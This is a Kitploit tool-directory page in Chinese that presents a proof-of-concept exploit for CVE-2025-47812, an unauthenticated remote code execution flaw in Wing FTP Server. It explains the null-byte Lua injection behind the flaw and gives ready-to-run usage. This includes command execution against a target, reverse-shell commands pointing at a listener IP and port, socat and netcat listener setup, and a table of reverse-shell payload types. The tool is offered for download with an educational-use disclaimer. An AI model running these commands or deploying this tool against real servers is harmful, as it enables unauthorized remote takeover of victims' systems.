Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-47812-PoC — 针对 Wing FTP Server (CVE-2025-47812) 的未认证远程代码执行利用工具,包含多种反向 shell 载荷、交互式和 CLI 模式,以及自动会话处理。 | Kitploit
工具/GitHubGitHub/havbay/cve-2025-47812-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队远程访问工具
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

针对 Wing FTP Server (CVE-2025-47812) 的未认证远程代码执行利用工具,包含多种反向 shell 载荷、交互式和 CLI 模式,以及自动会话处理。

查看仓库
16个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-47812 — Wing FTP Server 远程代码执行 (RCE)

Python CVSS Type

概述

字段值
CVECVE-2025-47812
影响版本Wing FTP Server < 7.4.4
类型未认证远程代码执行
CVSS 评分10.0(严重)
修复版本Wing FTP Server 7.4.4

工作原理

漏洞存在于 /loginok.html 登录端点。服务器未能正确过滤 username 字段中的空字节(%00)。攻击者可以利用这一点将任意的 Lua 代码 注入到会话文件中,这些文件随后在访问 /dir.html 等端点时被服务器端执行——整个过程无需任何认证。

参考链接: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


功能特性

  • 未认证命令执行
  • 多种反弹 Shell 载荷(socat、bash、python3、nc-e、nc-fifo、php)
  • Socat 载荷优先,提供完整交互式 TTY
  • 预检目标可达性
  • 自动提取会话 UID,每次尝试使用新会话
  • 通过 --payload 参数指定特定载荷
  • 使用 -o 将命令输出保存到文件
  • 可配置的 --timeout 和 --delay
  • 详细/调试模式(-v)
  • 优雅处理 Ctrl+C
  • 反弹 Shell 尝试后显示载荷摘要
  • CLI 参数模式 + 交互菜单
  • 彩色输出

环境要求

root@kitploit:~
pip install requests

使用方法

交互模式

root@kitploit:~
python3 wingftp_rce_exploit.py

CLI 模式

root@kitploit:~
# 执行命令
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# 将输出保存到文件
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# 反弹 Shell(尝试所有载荷)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# 反弹 Shell(指定载荷)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

所有选项

root@kitploit:~
-u / --url        目标基础 URL
-U / --username   登录用户名(默认:anonymous)
-c / --command    要执行的命令(命令模式)
-r / --rhost      你的监听 IP(反弹 Shell 模式)
-p / --rport      你的监听端口(反弹 Shell 模式)
     --payload    指定使用的载荷(参见下方列表)
     --timeout    HTTP 请求超时时间(秒,默认:10)
     --delay      载荷尝试之间的延迟(秒,默认:4)
-o / --output     将命令输出保存到文件
-v / --verbose    启用调试输出

反弹 Shell 载荷


示例

命令执行

root@kitploit:~
目标 URL : http://192.168.1.10:5466
用户名   : anonymous
选择     : 1
命令     : whoami

反弹 Shell

步骤 1 — 启动监听器(推荐使用 socat 以获得完整 TTY):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

或者使用 nc:

root@kitploit:~
nc -lvnp 4444

步骤 2 — 运行利用程序:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

致谢

  • 原始 PoC 作者:blindma1den
  • 改进与扩展:Havbuy

免责声明

本工具仅供教育目的及授权的安全测试使用。
严禁用于非你所有或未经明确书面授权的系统。
未经授权的使用是违法的。作者不对滥用行为承担任何责任。

下载工具
名称方法
socat通过 socat 获取完整 PTY
bash/dev/tcp 重定向
python3Socket 子进程
nc-e带 -e 参数的 Netcat
nc-fifoNetcat + mkfifo
phpPHP fsockopen